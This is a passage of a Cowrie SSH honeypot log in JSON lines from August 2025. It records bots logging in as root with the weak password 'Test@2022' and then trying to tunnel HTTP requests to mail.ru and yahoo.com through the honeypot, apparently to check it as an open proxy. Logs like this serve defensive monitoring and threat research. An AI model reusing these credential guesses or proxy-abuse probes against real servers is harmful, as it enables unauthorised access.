{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":6253,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:6253","sensor":"my-vps","timestamp":"2025-08-31T03:50:36.064530Z","session":"43ed361b0cc8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:36.114379Z","src_ip":"77.83.207.83","session":"43ed361b0cc8"}
{"eventid":"cowrie.session.closed","duration":"55.0","message":"Connection lost after 55.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:36.222770Z","src_ip":"212.227.235.229","session":"e85542b54f8c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17382,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:17382","sensor":"my-vps","timestamp":"2025-08-31T03:50:36.256243Z","session":"43ed361b0cc8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:36.306173Z","src_ip":"77.83.207.83","session":"43ed361b0cc8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":29345,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:29345","sensor":"my-vps","timestamp":"2025-08-31T03:50:36.448272Z","session":"43ed361b0cc8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:36.498307Z","src_ip":"77.83.207.83","session":"43ed361b0cc8"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:36.549567Z","src_ip":"77.83.207.83","session":"43ed361b0cc8"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":17329,"dst_ip":"1.2.3.4","dst_port":22,"session":"046e5fa89161","protocol":"ssh","message":"New connection: 77.83.207.83:17329 (1.2.3.4:22) [session: 046e5fa89161]","sensor":"my-vps","timestamp":"2025-08-31T03:50:36.598264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:36.599364Z","src_ip":"77.83.207.83","session":"046e5fa89161"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:36.650250Z","src_ip":"77.83.207.83","session":"046e5fa89161"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:36.899373Z","src_ip":"77.83.207.83","session":"046e5fa89161"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":32483,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:32483","sensor":"my-vps","timestamp":"2025-08-31T03:50:36.950046Z","session":"046e5fa89161"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.000109Z","src_ip":"77.83.207.83","session":"046e5fa89161"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":15049,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:15049","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.140389Z","session":"046e5fa89161"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","size":28,"shasum":"f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.180803Z","src_ip":"201.148.180.50","session":"bcd6c3389076"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.190527Z","src_ip":"77.83.207.83","session":"046e5fa89161"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48490,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecdf7c26e044","protocol":"ssh","message":"New connection: 212.227.235.229:48490 (1.2.3.4:22) [session: ecdf7c26e044]","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.239251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.239917Z","src_ip":"212.227.235.229","session":"ecdf7c26e044"}
{"eventid":"cowrie.session.closed","duration":"11.2","message":"Connection lost after 11.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.243184Z","src_ip":"201.148.180.50","session":"bcd6c3389076"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":31928,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:31928","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.332147Z","session":"046e5fa89161"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.338245Z","src_ip":"212.227.235.229","session":"ecdf7c26e044"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.382183Z","src_ip":"77.83.207.83","session":"046e5fa89161"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.433319Z","src_ip":"77.83.207.83","session":"046e5fa89161"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":17449,"dst_ip":"1.2.3.4","dst_port":22,"session":"553eeafe73e6","protocol":"ssh","message":"New connection: 77.83.207.83:17449 (1.2.3.4:22) [session: 553eeafe73e6]","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.482341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.483669Z","src_ip":"77.83.207.83","session":"553eeafe73e6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.534123Z","src_ip":"77.83.207.83","session":"553eeafe73e6"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.633822Z","src_ip":"212.227.235.229","session":"ecdf7c26e044"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.783417Z","src_ip":"77.83.207.83","session":"553eeafe73e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31782,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:31782","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.834141Z","session":"553eeafe73e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:37.884260Z","src_ip":"77.83.207.83","session":"553eeafe73e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":27090,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:27090","sensor":"my-vps","timestamp":"2025-08-31T03:50:38.024207Z","session":"553eeafe73e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:38.074198Z","src_ip":"77.83.207.83","session":"553eeafe73e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":18093,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:18093","sensor":"my-vps","timestamp":"2025-08-31T03:50:38.216299Z","session":"553eeafe73e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:38.266304Z","src_ip":"77.83.207.83","session":"553eeafe73e6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:38.317055Z","src_ip":"77.83.207.83","session":"553eeafe73e6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":17596,"dst_ip":"1.2.3.4","dst_port":22,"session":"550bc67ada02","protocol":"ssh","message":"New connection: 77.83.207.83:17596 (1.2.3.4:22) [session: 550bc67ada02]","sensor":"my-vps","timestamp":"2025-08-31T03:50:38.366912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:38.377546Z","src_ip":"77.83.207.83","session":"550bc67ada02"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:38.417491Z","src_ip":"77.83.207.83","session":"550bc67ada02"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:38.668394Z","src_ip":"77.83.207.83","session":"550bc67ada02"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":22262,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:22262","sensor":"my-vps","timestamp":"2025-08-31T03:50:38.720170Z","session":"550bc67ada02"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:38.732429Z","src_ip":"212.227.235.229","session":"ecdf7c26e044"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:38.770686Z","src_ip":"77.83.207.83","session":"550bc67ada02"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":15197,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:15197","sensor":"my-vps","timestamp":"2025-08-31T03:50:38.912681Z","session":"550bc67ada02"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:38.963383Z","src_ip":"77.83.207.83","session":"550bc67ada02"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":18479,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:18479","sensor":"my-vps","timestamp":"2025-08-31T03:50:39.104776Z","session":"550bc67ada02"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:39.155301Z","src_ip":"77.83.207.83","session":"550bc67ada02"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:39.206161Z","src_ip":"77.83.207.83","session":"550bc67ada02"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":17729,"dst_ip":"1.2.3.4","dst_port":22,"session":"08e431e4e6fd","protocol":"ssh","message":"New connection: 77.83.207.83:17729 (1.2.3.4:22) [session: 08e431e4e6fd]","sensor":"my-vps","timestamp":"2025-08-31T03:50:39.255606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:39.256476Z","src_ip":"77.83.207.83","session":"08e431e4e6fd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:39.307237Z","src_ip":"77.83.207.83","session":"08e431e4e6fd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:39.560542Z","src_ip":"77.83.207.83","session":"08e431e4e6fd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":13007,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:13007","sensor":"my-vps","timestamp":"2025-08-31T03:50:39.612094Z","session":"08e431e4e6fd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:39.662955Z","src_ip":"77.83.207.83","session":"08e431e4e6fd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":12299,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:12299","sensor":"my-vps","timestamp":"2025-08-31T03:50:39.805375Z","session":"08e431e4e6fd"}
